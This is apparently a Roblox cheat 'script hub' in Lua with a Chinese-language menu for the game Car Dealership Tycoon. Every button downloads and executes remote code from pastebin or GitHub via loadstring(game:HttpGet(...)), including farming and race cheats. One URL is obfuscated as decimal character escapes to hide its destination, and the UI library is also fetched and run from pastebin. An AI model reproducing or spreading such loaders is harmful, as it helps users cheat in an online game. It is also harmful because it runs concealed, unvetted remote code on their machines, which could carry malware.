local OrionLib = loadstring(game:HttpGet("https://pastebin.com/raw/FUEx0f3G"))()

OrionLib:MakeNotification({
      Name = "Grk-cdt专属",
      Content = "N9:包圈钱的",
      Time = 2.5 })

local Window = OrionLib:MakeWindow({Name = "Grk脚本中心", HidePremium = false, SaveConfig = false, IntroText = "Grk无敌", ConfigFolder = "."})

local Tab =Window:MakeTab({
	Name = "汽车经销商大亨",
	Icon = "rbxassetid://17379459408",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "cdt-刷星星脚本",
	Callback = function() 	
  loadstring(game:HttpGet("https://raw.githubusercontent.com/F347-FB/Roblox/main/Loader"))()
  	end    
})
Tab:AddButton({
	Name = "cdt-比赛Race脚本",
	Callback = function() 	
  loadstring(game:HttpGet("https://raw.githubusercontent.com/Marco8642/science/main/car%20dealer", true))()
  	end    
})
Tab:AddButton({
	Name = "cdt-f3x模块",
	Callback = function() 	
  loadstring(game:HttpGet("https://raw.githubusercontent.com/balintTheDevX/TigerX-V2/main/Back"))()
  	end    
})

local Tab =Window:MakeTab({
	Name = "各大脚本",
	Icon = "rbxassetid://17379459408",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "脚本中心",
	Callback = function() 	
 loadstring(game:HttpGet("\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\103\101\109\120\72\119\65\49"))() 
  	end    
})